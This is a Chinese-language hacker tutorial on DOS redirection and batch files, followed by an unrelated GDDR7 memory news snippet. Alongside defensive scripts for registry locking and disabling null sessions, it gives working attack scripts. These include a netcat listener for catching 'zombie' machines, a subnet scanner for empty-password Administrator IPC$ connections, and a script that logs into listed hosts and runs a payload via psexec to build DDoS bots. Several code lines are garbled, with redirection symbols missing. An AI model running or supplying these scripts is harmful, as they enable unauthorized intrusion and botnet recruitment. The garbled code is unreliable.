DDR爱好者之家 Design By 杰米

大家知道,DOS下有一个不为大家所常用的命令——重定向命令,这个小东西非常有用,该命令同样可以用于 Win9x/ME/2000/XP下,灵活的使用这个命令可以给我们带来很大的方便——无论是入侵还是防守抑或是系统应用,都会带来很大的便利。今天就让 我们来看几个重定向命令在安全方面的应用实例。

一、命令格式

DOS的标准输入输出通常是在标准设备键盘和显示器上进行的,利用重定向,可以方便地将输入输出改向磁盘文件或其它设备。其中:

(1).大于号“>”将命令发送到文件或设备,例如打印机>prn。使用大于号“>”时,有些命令输出(例如错误消息)不能重定向。

(2).双大于号“”将命令输出添加到文件结尾而不删除文件中已有的信息。

(3).小于号“<”从文件而不是键盘上获取命令所需的输入。

(4).>&符号将输出从一个默认I/O流(stdout,stdin,stderr)重新定向到另一个默认I/O流。

例如,command >output_file 2>&1将处理command过程中的所有错误信息从屏幕重定向到标准文件输出中。标准输出的数值如下所示:

标准输出 等价的数值

Stdin 0
Stdout 1
Stderr 2

其中,(1)和(2)都创建一个文件用于存放数据;(4)可能不能够在DOS下使用。

二、重定向命令的输出

几乎所有的命令均将输出发送到屏幕。即使是将输出发送到驱动器或打印机的命令,也会在屏幕上显示消息和提示。要将输出从屏幕重定向到文件或打印机,请使 用大于号(>)。大多数命令中均可以使用大于号。例如,在以下命令中,dir命令生成的目录列表重定向到Dirlist.txt文件: dir>dirlist.txt,如果Dirlist.txt文件不存在,系统将创建该文件。如果Dirlist.txt存在,系统将使用dir命 令的输出替换文件中的信息。

要将命令输出添加到文件结尾而不丢失文件中的任何信息,请使用双大于号()。例如, 在以下命令中,dir命令生成的目录列表附加到Dirlist.txt文件中:dir>dirlist.txt,将输入重定向到一个命令,就象可以 将命令输出发送到文件或打印机而不是屏幕一样,您可以从文件而不是从键盘获取命令的输入。要从文件获取输入,请使用小于号(<)。例如,以下命令将 从List.txt文件中获取sort命令的输入:sort

三、应用举例

1.给注册表加锁/解锁

大家知道,注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\ Policies\System分支下的DWORD值“Disableregistrytools”的键值如为“1”,则可以给注册表加锁,这样别人就无 法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁,非常方便。

打开记事本程序,新建一个文本文件,输入如下内容:

@echo REGEDIT4123.reg
@echo.123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]123.reg
@echo "DisableRegistryTools"=dword:00000001123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存为以.bat为扩展名的批处理文件,点击这个文件注册表就会被锁定!

在上面的命令中,echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,如果想看到程序执行过程, 请将“@”去掉。大家在编写上述代码时要注意的是,第一行中的“REGEDIT4”一定要用大写字母,在第二行中“echo”和“.”之间没有空格。 “”产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以无需确认就删除123.reg文件。

要想给注册表解锁,可以编辑这个批处理文件,只需将 "DisableRegistryTools"=dword:00000001改为"DisableRegistryTools"=dword: 00000000,其他内容不变,保存为.bat文件,点击就可以给注册表解锁了。

2.把登陆3389的机器IP记录下来

把下面的内容保存为3389IP.bat:

time /t log.log
netstat -n -p tcp |find ":3389"Log.log
start Explorer

运行3389IP.bat,然后查看log.log文件即可看到登陆3389的机器IP,是不是很方便呢"htmlcode">

echo off
echo REGEDIT4>c:\scanreg.reg
@echo.lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]c:\scanreg.reg
echo "NoRealMode"=dword:00000000c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg

另存为以.bat为扩展名的批处理文件,点击这个文件就可以恢复DOS实模式,那些DOS应用程序又可以使用了。

4.等待肉鸡上门

每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:

@echo off
:start
nc -vv -w 5 -l -p 80rouji.log
goto start

保存为.bat文件(事先得准备好一个nc.exe文件,它是网络故障事件检测软件Netcat的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天10个不成问题。

5.快速进行空连接

空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use \\IP\ipc""/user:""就可以简单地和目标建立一个空连接(需要目标开放IPC)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件 中供你分析。方法是用记事本编辑如下内容的文件:

@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G test.txt & net use \%1.%%Gipc""/use:"Administrator"|find"命令完成"test.txt

批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行 某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters],具体的含义:

%variable:指定一个单一字母可替换的参数。

(set):指定一个或一组文件。可以使用通配符。

command:指定对每个文件执行的命令。

command-parameters:为特定命令指定参数或命令行开关。

在批处理文件中使用FOR命令时,指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的,所以%i不同%I。

6.禁止空连接

空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入net share察看本地共享资源,接下来输入如下命令删除共享:

net share ipc/deletenetshareadmin /delete
net share c/deletenetshared /delete(如果有e,f等盘符可以同法删除)

然后用记事本新建一个文本文件,输入如下内容即可:

@echo REGEDIT4123.reg
@echo.123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]123.reg
@echo "RestrictAnonymous"=dword:00000001123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。

7.扫描所有和本机以TCP协议连接的计算机

扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:

data /t123.log
time /t123.log
netstat -n -p tcp 10123.log

这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。

8.自动获取DDoS肉鸡

DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从 而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯, 代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理 程序的运行。

虽然不建议大家使用DDoS方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行DDoS攻击的肉鸡呢"htmlcode">

@echo off
echo自动获取DDoS肉鸡
for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc/user:"\sysytem32
if errorelevel 0 goto success
psexec -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$ /del
:success
echo ------------------------------success.txt
echo 肉鸡:%isuccess.txt
echo 用户名:%jsuccess.txt
echo 密码:%ksuccess.txt
echo ------------------------------success.txt

使用方法是ok.bat *.exe host.txt,其中host.txt的格式为:ip administrator password。好了,快试试吧。但不要用来干破坏哦。

其实,本文所说的方法主要是利用了批处理和相关的命令,重定向命令在其中只是个“传接剂”,起连接作用,但它的功劳也是不小的,所以我们不要忘了重定向命令哦。本文只是抛砖引玉,希望大家畅所欲言,多多指点。在写作时参阅过众多高手的论坛帖子,多谢各位。

DDR爱好者之家 Design By 杰米
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站资源来自互联网收集,仅供用于学习和交流,请遵循相关法律法规,本站一切资源不代表本站立场,如有侵权、后门、不妥请联系本站删除!
DDR爱好者之家 Design By 杰米

RTX 5090要首发 性能要翻倍!三星展示GDDR7显存

三星在GTC上展示了专为下一代游戏GPU设计的GDDR7内存。

首次推出的GDDR7内存模块密度为16GB,每个模块容量为2GB。其速度预设为32 Gbps(PAM3),但也可以降至28 Gbps,以提高产量和初始阶段的整体性能和成本效益。

据三星表示,GDDR7内存的能效将提高20%,同时工作电压仅为1.1V,低于标准的1.2V。通过采用更新的封装材料和优化的电路设计,使得在高速运行时的发热量降低,GDDR7的热阻比GDDR6降低了70%。